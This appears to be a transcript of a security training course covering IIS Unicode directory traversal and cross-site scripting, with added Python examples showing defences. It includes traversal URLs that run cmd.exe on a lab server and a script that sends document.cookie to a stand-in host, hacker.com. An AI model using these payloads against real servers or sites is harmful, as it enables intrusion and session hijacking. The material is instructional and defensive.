6. Directory Traversal & Other Common Vulnerabilities
Now, the next thing we want to talk about are some of the common attacks. The first thing I want to start with is something called directory traversal. I'm going to demonstrate this with an older version of IIS, because I know it happens to be vulnerable to this. Now, a directory traversal, sometimes called a path traversal, consists of exploiting insufficient security validation or sanitization of user-supplied file names, so that characters representing "traverse to the parent directory" are passed straight through to the file APIs. The goal of this attack is to order an application to access a file that is not intended to be accessible to that user. It exploits a lack of security checks.
Now, the software is actually acting the way it was written to, as opposed to the attack exploiting a bug in the code. So this is generally a problem we have either with the Web server allowing access because of problems with an access control list, or, as some people would say, with the developer not filtering these characters out. In my particular opinion, both of these should be done. Directory traversal is also known as the dot-dot-slash (../) attack, directory climbing, or backtracking, and some forms of it are canonicalization attacks as well. So let's go ahead and take a look at a demo that I've got set up for you.
Now, what I'm going to do is get access to this older version of Windows, and I'm going to do it through Internet Explorer. Now, when this version of the Web server first came out, it didn't filter out the things it was supposed to filter out. So what I'm going to attempt to do is run the whoami command. As you can see right here, I've got the URL for the whoami command; I'll paste it into Internet Explorer with Control-V. I want you to notice that this is going to attempt to attach to 1041 156, which is my Windows 2000 server. It's going to go into /scripts, then it does some kind of gibberish that I'm going to explain in a couple of moments,
and then it finally arrives at the whoami command. If all goes well, it's going to give me this particular screen. It's saying that the whoami command is running under the permissions of IUSR_NXT, and then this particular number right here. Now, what is actually happening here? I'm going to explain that in a couple of moments, but first I'm going to run a couple of other commands rather than whoami. Maybe I'll run the arp command and pass it -a. Now, remember, in order for the server to display an entry in its ARP cache, it would have had to speak to those particular hosts within the last two minutes or so; otherwise it would say "no entries found".
Now, in this particular case I'm almost willing to bet that the machine I'm doing this from, the XP machine, is the one ending in 152, because it would have had to ARP and then come back, and that's why it's in this table. I'm also able to determine which one is probably the firewall, or perhaps the application server, or even which one is the SQL Server, because naturally the Web server is going to be talking to one of those. Let's say I would like to do an ipconfig /all. Now, in most cases your Web server that's sitting on the Internet is going to have two cards. One of them is going to be used to service the Internet; the other card is going to be used for its back-end services, for example access through the firewall to the SQL Server.
So I would like to be able to find out what that is. If I click on Go right here, it's going to give me all of the information, as if I had typed ipconfig right there on the command line. So if you've already surmised that what I'm doing is running commands on that Web server, you're absolutely right. Let's go ahead and do a couple more commands here, and then I'll explain this in more detail. Let's try doing the netstat command. All right, these are the various ports that are open or listening on this particular machine, and the one I'm attached to. I can tell you right now, there's not an IDS in the world that's going to pick this up as a port scan.
What I've done is basically ask the Web server itself to tell me what's attached to it and what ports it has open, without using anything like Nmap or port-scanning software that might be picked up. It simply gives me back that list. So I'm running commands on this server. Okay, Tim, how did you do this? Well, let's go ahead and look at this in a little more detail. If I look more closely, you can see some of these URLs look a little funky, a little strange. What this is, is a mechanism for me to "dot-dot", in other words, move up a directory.
So I'm telling it to move up a directory, move up a directory, move up a directory, in a language that we happen to have not filtered out. Now, the way I understand it, this language happens to be Farsi, so it would have printed the Arabic characters if I had that language pack installed. When they built this version, it didn't happen to filter out that particular language, or that Unicode value, which is what it's typically referred to as. So what I'm actually doing is running commands on my Windows 2000 server out of the system directory. You may have heard some people tell you that you should always install IIS on a drive other than the system drive, for example the D: drive.
Then you put your IIS on that D: drive, so that the system drive, the one where we have commands like netstat and cmd and other things we wouldn't necessarily want individuals to have access to, can't be navigated to even if somebody does drop the ball, because a dot-dot sequence can't climb across drive letters. That's the reason they tell you to do something like this. Let's try one more command here. Okay, so I went ahead and typed that in, and you can see what I'm trying to do is run an instance of the command console, cmd.exe. The /c tells it to run the command that follows, including any commands that are internal to cmd, and dir is one of those. So it should return a directory listing of my C: drive.
This gives me the directory of my lab folders. If I want to navigate a little further down into this I could, let's say, go into pwdump2; this is the pwdump folder. I could basically go throughout the entire directory structure looking for something, or even put something up there by using a TFTP server, like we did in the SQL lab. So I can upload files and download files, and that is if and only if I have the permission to do so as the user that was displayed by the whoami command. So I'm not running as an administrator here; I'm running under the permission set of whatever the Web server is running as.
Now, this is one of the big reasons we don't run our Web servers as administrator: if we did, naturally we would be able to create users and do whatever we wanted to here, and that's not something we want to happen. So, a couple of other things here. The ASCII characters for the dots can be replaced by their hexadecimal equivalent, in other words %2e, and the slash can be replaced with a Unicode equivalent; there are different Unicode encodings for all of these. Overlong encodings are not necessarily malformed, but they are not allowed by a correct Unicode encoder or decoder,
and they are used to maliciously bypass filters. Now, here's the problem we're going to run into. Just to give you an example, using Unicode and some of the other encoding techniques available on the Web, here are 70 different ways to encode the less-than sign, which is used as the opening of a lot of tags in HTML. Here is the way we might look for it when we're trying to filter it out, but we would have to go through every one of these 70 in order to filter correctly. If we drop the ball on any one of them, we're going to run into problems. So you can see that unless we write our filtering mechanisms correctly, we're going to run into problems.
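To make the "gibberish" in the demo URL concrete, here is an added example (not code from the course or from IIS) that simulates the two things the demo relies on: the traversal check running on the undecoded URL, and a decoder that accepts the overlong two-byte form of "/" (the bytes C0 AF, which is what %c0%af carries). It is placed beside a resolver that decodes strictly, canonicalizes, and only then checks that the result is still under the web root. The web root /c/inetpub, the directory layout and the request paths are constructed for illustration; the query string "?/c+dir" that follows cmd.exe in the demo is what becomes its arguments and is left out here because only the path part matters to the check.

```python
"""Added example, not from the course: a simulation of the IIS "Unicode
traversal" ordering bug (check the raw URL, then decode leniently) next to a
canonicalize-then-check resolver. The filesystem layout, the web root
/c/inetpub and the request paths are all constructed for illustration."""
import posixpath
from typing import Optional
from urllib.parse import unquote_to_bytes

WEB_ROOT = "/c/inetpub"  # assumed: scripts/ and wwwroot/ both live under it

# Constructed request paths (only the path part of the demo URLs).
UNICODE_PAYLOAD = "/scripts/..%c0%af../winnt/system32/cmd.exe"  # C0 AF = overlong '/'
HEX_PAYLOAD = "/scripts/%2e%2e/%2e%2e/winnt/system32/cmd.exe"   # %2e = '.'
PLAIN_PAYLOAD = "/scripts/../../winnt/system32/cmd.exe"
LEGIT_PATH = "/scripts/hello.asp"


def escapes_root(path: str) -> bool:
    """True if walking the '/'-separated segments ever climbs above the root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def decode_overlong_utf8(data: bytes) -> str:
    """Lenient decoder that reproduces the bug: a two-byte sequence such as
    C0 AF is accepted and mapped to the code point it overlong-encodes
    (U+002F, '/'), which a correct UTF-8 decoder must reject."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")  # anything else: replacement character
            i += 1
    return "".join(out)


def vulnerable_resolve(raw_url_path: str) -> Optional[str]:
    """Traversal check on the undecoded URL, then lenient decoding for the
    actual file open: the order the demo abuses. "..%c0%af.." is just an odd
    directory name to the check, but "../.." to the decoder."""
    if escapes_root(raw_url_path):
        return None
    decoded = decode_overlong_utf8(unquote_to_bytes(raw_url_path))
    return posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))


def resolve_safely(raw_url_path: str) -> Optional[str]:
    """Decode strictly first, canonicalize, then verify the result is still
    inside WEB_ROOT. Python's strict UTF-8 decoder rejects overlong forms."""
    try:
        decoded = unquote_to_bytes(raw_url_path).decode("utf-8")
    except UnicodeDecodeError:
        return None
    decoded = decoded.replace("\\", "/")  # Windows accepts either separator
    full = posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))
    if full != WEB_ROOT and not full.startswith(WEB_ROOT + "/"):
        return None
    return full


if __name__ == "__main__":
    for p in (UNICODE_PAYLOAD, HEX_PAYLOAD, PLAIN_PAYLOAD, LEGIT_PATH):
        print(f"{p}\n  vulnerable -> {vulnerable_resolve(p)}\n  safe       -> {resolve_safely(p)}")
```

Running it shows the plain "../../" request being caught by both resolvers, while the %2e and %c0%af spellings walk the vulnerable one out to /c/winnt/system32/cmd.exe and are refused by the safe one. The order is the whole lesson: decode everything first, canonicalize, and only then compare against the root; a check on the raw request string is the one that gets talked around.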
7. XSS Demo and Countermeasures
Now, you may actually remember this application from our SQL injection lab. I happen to know it also has some cross-site scripting vulnerabilities, so I'm going to use it to demonstrate this. What I'm going to do is click on the Professional ASP book, where it's going to let me write a review in the review box. I'm going to type in this right here. So I'm going to grab this, come over here, click on Professional ASP, then click on Write a Review, and paste in what I copied. Now I click on Submit right here, and it says "the page at such-and-such says: XSS."
This is how a lot of pen testers will prove to you that, hey, you've got cross-site scripting on your site. Now, people who don't really think it's that big of a deal will say, well, just click OK or close the X right there. They don't really get the concept of the things that can be done with cross-site scripting, so let me see if I can go into a little more detail here. One of the most popular ways that cross-site scripting attacks you is to try to steal your cookies. So what is actually going on here? When we go to a web page, more than likely something that shows up in our browser-based email, and we click on something dubious, it runs this script. Now let's take a look at the script.
The script says: script, document.location equals www.hacker.com/cgi-bin/cookie.cgi, then a question mark, then document.cookie. In other words, it sends hacker.com a URL whose parameter is document.cookie; I'm sending it my cookie. It's going to send this hacker my cookie, which I probably didn't expect it to do. Okay, big deal, Tim, they've got my cookie. Well, it is a big deal, especially if it is your email, because webmail uses cookies to keep you authenticated. Have you ever gone into your email, sent an email to somebody, closed the browser, then thought, oh, I needed to do this too,
went back in and, oh, I'm still logged in? How about that? That's the cookie doing that. If somebody else had your cookie, then guess what: they would be authenticated to your email. Have you ever received an email from someone, I'm going to use my grandmother as an example, where my grandmother says, "I'm in a prison in Florida, please send me money via PayPal so I can get out"? I'm like, Grandma, I know you wouldn't be in some prison. If you've ever seen an email that was just totally off the wall, then that's probably somebody who has clicked something in their email.
The hacker has gone into their email, used their address book, and tried to send out something called a phishing attack, hoping somebody will send them some money. I venture to say most people have actually encountered this. So let's go a little further here. What actually happens, if we start at the basics: how is a browser itself different from, let's say, cmd.exe? Well, both of them can modify and access files. As we've seen, they both can execute programs. So gosh, that's kind of the same, isn't it? We're basically saying, here, drive my box. Surfing the web is like giving every website you go to a shell on your box.
Whoa, things just got real now, didn't they? Going further, here's a reality check on what is actually happening. Your browser just starts at the top of the page and reads whatever HTML code is there until it gets to the bottom. A web browser interprets your HTML document as one great big long line. So what's happening? Your browser doesn't know whether a particular line of code originated from the site or from a user who may have injected it. It doesn't know if the code is good or bad. It starts at the top and reads to the bottom. Now, there are two main types of cross-site scripting. The first is what I like to refer to as reflected; most people will call it non-persistent.
This is where you write something and have it reflected back to you and executed. You saw this just a few seconds ago when we demonstrated it in that bookstore page. The other one is called persistent, or stored, as I like to refer to it. It lies in wait for an unwitting victim to click on something or go to a page, inserts its code into that HTML page, and then it's executed. The example I used when I wrote my book: you could put in a Craigslist ad, and in that Craigslist ad you write, "My wife and I are going through a divorce. I hold the title to her current-year Lexus; first $1,000 gets it."
I can tell you right now, a lot of people are going to click on that. If in that Craigslist ad I put in something nefarious like this script, it would execute and send the viewer's Craigslist cookie over to the attacker. Now, maybe that's not going to be that big of a deal, but you get the idea. So you have to think about where you can write to on the Web: a search box, a blog, a forum, a guest book, a contact-us form, a feedback form, chat, or instant messenger. If what you can write can be rendered by a browser as something executable, then cross-site scripting can happen to you. Here a script, there a script, here's a good script, there's a bad script, inserted on a site with user-contributed content. The browser doesn't know whether it's good or bad.
It starts at the top and runs the code until it gets to the end of the page. It doesn't know any different. Now, the generic recipe for cross-site scripting, as I said before, starts with "where can I write?" The attacker will usually capture your user ID, session ID, or cookie, send the session ID to another server, in other words cross-site, then use that stolen session ID to log in to the website as if they were you. So if what you can write can be rendered by a browser as executable, cross-site scripting is a lot more dangerous than the guy who just told me to click OK or click the X would think. Whenever I do a pen test, I'll often do it for a contract of, say, over five years. The first year, I identify the cross-site scripting issues.
Now, the ones with SQL injection, boy howdy, they fix those real quick. The next year when I come back, they've still got the cross-site scripting in there. I'll typically do a demonstration for them and show them the bad things that can happen with cross-site scripting, and then they really do want to fix it as well. Now, real quickly, let's talk about a couple of countermeasures here. The first, and the most effective, solution is to disable all scripting language support in your browser and email reader. Well, okay, if it were maybe 15 years ago that might work, but most modern web browsers really use a lot of script. If that's not an option, I could use a utility called NoScript.
It gives you the capability of disabling scripts based upon whether you know or trust the website. So for any website you go to that you don't know, you may want to have that particular website not execute any scripts. It's a really good little utility to use, especially if you're doing the things I do when I'm going out to some of the dark net sites, where I really don't know these people at all and they don't have a good track record for being ethical. If that is not a possibility either, another recommendation is to use reasonable caution when clicking links in anonymous emails and dubious web pages. Use proxy servers that can help filter out malicious scripting in HTML, or run your browser in a container or sandbox such as Sandboxie, or even run the browser itself inside a virtual machine.
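The countermeasures above are all on the browser side. For the people who own the bookstore application, the fix is on the server: encode what users wrote before it goes back into the page, and keep the session cookie out of reach of document.cookie. Here is an added example (not code from the course or from the bookstore application) that renders the review box three ways: straight concatenation, a "strip the script tag" blocklist of the kind the 70-encodings slide warns about, and proper HTML output encoding. It also builds the Set-Cookie header with HttpOnly, which is what stops the cookie.cgi script from reading the session cookie even when the XSS itself is still there. The payload, the review variants and the session ID are constructed for illustration.

```python
"""Added example, not from the course: the review box from the bookstore demo
rendered unsafely, through a blocklist, and with output encoding, plus a
session cookie set so document.cookie cannot read it. The payload, review
text and session ID are constructed."""
import html
from http.cookies import SimpleCookie

# The cookie-stealing script discussed in the section (constructed payload).
COOKIE_THIEF = ("<script>document.location='http://www.hacker.com/cgi-bin/cookie.cgi?'"
                "+document.cookie</script>")

# Variants a naive filter misses: mixed case, and no <script> tag at all.
VARIANTS = [
    "<ScRiPt>alert('XSS')</ScRiPt>",
    "<img src=x onerror=\"alert('XSS')\">",
    "<a href=\"javascript:alert('XSS')\">free Lexus</a>",
]

WRAP_OPEN, WRAP_CLOSE = '<div class="review">', "</div>"


def render_review_unsafe(review: str) -> str:
    """Stored XSS: user text is concatenated straight into the page."""
    return f"{WRAP_OPEN}{review}{WRAP_CLOSE}"


def blocklist_strip(review: str) -> str:
    """The tempting fix that does not work: delete one spelling of the tag."""
    return review.replace("<script>", "").replace("</script>", "")


def render_review_safe(review: str) -> str:
    """Output encoding for an HTML text context: every character that can
    open a tag or attribute becomes an entity, whatever the input looked like.
    The browser shows the review verbatim and never executes it."""
    return f"{WRAP_OPEN}{html.escape(review, quote=True)}{WRAP_CLOSE}"


def contains_markup(fragment: str) -> bool:
    """Crude check used only to show which rendering still carries markup
    inside the wrapper div."""
    body = fragment[len(WRAP_OPEN):-len(WRAP_CLOSE)]
    return "<" in body or ">" in body


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie with HttpOnly so script cannot read it via document.cookie,
    Secure so it only travels over HTTPS, and SameSite=Lax to limit cross-site
    sends. HttpOnly does not remove the XSS; it takes the cookie off the table."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    return jar.output(header="Set-Cookie:").strip()


if __name__ == "__main__":
    for text in [COOKIE_THIEF] + VARIANTS:
        print("unsafe   :", render_review_unsafe(text))
        print("blocklist:", render_review_unsafe(blocklist_strip(text)))
        print("escaped  :", render_review_safe(text))
    print(session_cookie_header("c0ffee"))
```

The blocklist looks like it works on the exact payload from the demo and then misses every variant, which is the same lesson as the 70 encodings of the less-than sign: you cannot enumerate bad input, so encode all output for the context it lands in instead. HttpOnly is a second, independent layer; the browser still runs the injected script, but document.cookie no longer contains anything worth sending to cookie.cgi.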